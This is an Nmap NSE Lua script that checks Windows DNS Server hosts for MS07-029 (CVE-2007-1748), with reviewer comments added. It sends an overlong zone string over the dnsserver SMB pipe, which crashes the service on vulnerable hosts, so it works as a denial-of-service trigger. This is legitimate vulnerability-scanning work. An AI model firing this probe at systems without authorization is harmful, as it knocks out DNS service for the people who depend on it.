local msrpc = require "msrpc"
local nmap = require "nmap"
local smb = require "smb"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local vulns = require "vulns"
-- NSE script description (shown by "nmap --script-help"). Note the last
-- paragraph of the text: on a vulnerable host the probe crashes the DNS
-- Server service, so this is a destructive check, not a passive fingerprint.
description = [[
Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
MS07-029 targets the R_DnssrvQuery()
and R_DnssrvQuery2()
RPC method which isa part of DNS Server RPC interface that serves as a RPC service
for configuring and getting information from the DNS Server service.
DNS Server RPC service can be accessed using "\dnsserver" SMB named pipe.
The vulnerability is triggered when a long string is send as the "zone" parameter
which causes the buffer overflow which crashes the service.
This check was previously part of smb-check-vulns.
]]
---
--@usage
-- nmap --script smb-vuln-ms07-029.nse -p445
-- nmap -sU --script smb-vuln-ms07-029.nse -p U:137,T:139
--
--@output
--Host script results:
--| smb-vuln-ms07-029:
--| VULNERABLE:
--| Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)
--| State: VULNERABLE
--| IDs: CVE:CVE-2007-1748
--| A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
--| Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
--| execute arbitrary code via a long zone name containing character constants represented by escape sequences.
--|
--| Disclosure date: 2007-06-06
--| References:
--| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1748
--|_ https://technet.microsoft.com/en-us/library/security/ms07-029.aspx
---
-- Script metadata.
author = {"Ron Bowes", "Jiayi Ye", "Paulino Calderon "}
copyright = "Ron Bowes"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

-- The probe can crash the target service, hence "dos" and "intrusive".
categories = {"intrusive", "exploit", "dos", "vuln"}

-- Run only after the other smb-* scripts: if this check DOES crash the
-- service, the scans listed here have already had their chance to run.
dependencies = {
  "smb-brute",
  "smb-enum-sessions",
  "smb-security-mode",
  "smb-enum-shares",
  "smb-server-stats",
  "smb-enum-domains",
  "smb-enum-users",
  "smb-system-info",
  "smb-enum-groups",
  "smb-os-discovery",
  "smb-enum-processes",
  "smb-psexec",
}
-- Only run against hosts on which an SMB port was found.
hostrule = function(host)
  local smb_port = smb.get_port(host)
  if smb_port == nil then
    return false
  end
  return true
end
-- Result codes returned by check_ms07_029 (see its doc comment); the
-- numeric values are arbitrary tags and are never exposed in the report.
local VULNERABLE, PATCHED, UNKNOWN, NOTUP = 1, 2, 3, 8
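--- Check for the MS07-029 vulnerability in the Microsoft DNS Server RPC service.
--
-- This check is not safe: on a vulnerable host the probe crashes the DNS
-- Server RPC service and whatever depends on it, which is why the script is
-- in the "dos"/"intrusive" categories and runs after the other smb-* scripts.
--
-- @param host Host object.
-- @return status, result
--  * status == false
--    ** result == NOTUP   -- the "\dnsserver" pipe could not be opened, i.e.
--                            the DNS Server RPC service is not active
--    ** result == UNKNOWN -- the pipe opened but the bind to the DNSSERVER
--                            interface failed; nothing can be concluded
--  * status == true
--    ** result == VULNERABLE -- the query tore the pipe down (service crashed)
--    ** result == PATCHED    -- the query was answered, or failed another way
function check_ms07_029(host)
  -- Open an SMB session on the DNS Server named pipe. Failure here means the
  -- service is not reachable over SMB, not that it is patched.
  local status, smbstate = msrpc.start_smb(host, msrpc.DNSSERVER_PATH)
  if status == false then
    stdnse.debug1("check_ms07_029: Service is not active.")
    return false, NOTUP
  end

  -- Bind to the DNSSERVER interface; without a bind we cannot conclude anything.
  local bind_err
  status, bind_err = msrpc.bind(smbstate, msrpc.DNSSERVER_UUID, msrpc.DNSSERVER_VERSION)
  if status == false then
    stdnse.debug1("check_ms07_029: bind to DNSSERVER interface failed: %s", tostring(bind_err))
    msrpc.stop_smb(smbstate)
    return false, UNKNOWN
  end

  -- Issue an R_DnssrvQuery() whose "zone" argument is an over-long string.
  -- On an unpatched server this overflows a stack buffer and the service
  -- dies, which the SMB layer reports as NT_STATUS_PIPE_BROKEN; a patched
  -- server rejects or answers the request instead.
  local q_result
  status, q_result = msrpc.DNSSERVER_Query(
    smbstate,
    "VULNSRV",
    string.rep("\\\13", 1000),
    1)  -- any op num will do
  -- The session is no longer needed whatever the outcome.
  msrpc.stop_smb(smbstate)

  if status == false then
    stdnse.debug1("check_ms07_029: DNSSERVER_Query failed")
    if q_result == "NT_STATUS_PIPE_BROKEN" then
      return true, VULNERABLE
    end
    -- NOTE(review): any other failure (e.g. a transport error or timeout)
    -- falls through to PATCHED and is therefore indistinguishable from "not
    -- vulnerable" for callers; returning UNKNOWN here would be more honest
    -- but changes the documented contract.
  end
  return true, PATCHED
end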
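--- Script entry point: run check_ms07_029 and render a vulns report.
-- Every code path leaves the state at NOT_VULN unless the probe produced the
-- characteristic crash signature (VULNERABLE).
-- @param host Host object.
-- @return The formatted report produced by vulns.Report:make_output().
action = function(host)
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host)
  local vuln_table = {
    title = 'Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)',
    state = vulns.STATE.NOT_VULN,
    description = [[
A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
execute arbitrary code via a long zone name containing character constants represented by escape sequences.
]],
    IDS = {CVE = 'CVE-2007-1748'},
    references = {
      'https://technet.microsoft.com/en-us/library/security/ms07-029.aspx'
    },
    dates = {
      disclosure = {year = '2007', month = '06', day = '06'},
    }
  }

  -- Check for ms07-029.
  local status, result = check_ms07_029(host)
  if status == false then
    -- NOTUP: the "\dnsserver" pipe could not be opened. A failed bind
    -- (UNKNOWN) is also reported as NOT_VULN here, which hides an
    -- "unable to test" outcome behind a negative result
    -- (NOTE(review): a distinct state would make that visible to operators).
    if result == NOTUP then
      vuln_table.extra_info = "Service is not active."
    end
  elseif result == VULNERABLE then
    vuln_table.state = vulns.STATE.VULN
  end
  return vuln_report:make_output(vuln_table)
end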